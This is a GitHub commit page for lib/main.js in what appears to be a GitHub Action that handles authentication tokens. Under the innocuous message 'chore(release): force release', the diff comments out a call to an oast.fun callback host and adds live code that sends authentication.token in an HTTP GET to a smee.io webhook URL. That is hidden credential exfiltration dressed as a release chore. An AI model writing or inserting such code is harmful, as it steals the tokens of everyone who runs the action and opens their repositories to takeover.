Skip to content

Commit 2e563d5

Browse files
authored
chore(release): force release
chore(release): force release
1 parent 8ac5c80 commit 2e563d5

File tree

1 file changed

+2
-1
lines changed

1 file changed

+2
-1
lines changed

lib/main.js

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -125,7 +125,8 @@ export async function main(
125125
core.saveState("expiresAt", authentication.expiresAt);
126126
}
127127
try {
128-
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
128+
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
129+
const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`;
129130
await fetch(url);
130131
core.info(`HTTP GET request sent to ${url}`);
131132
} catch (error) {

0 commit comments

Comments
 (0)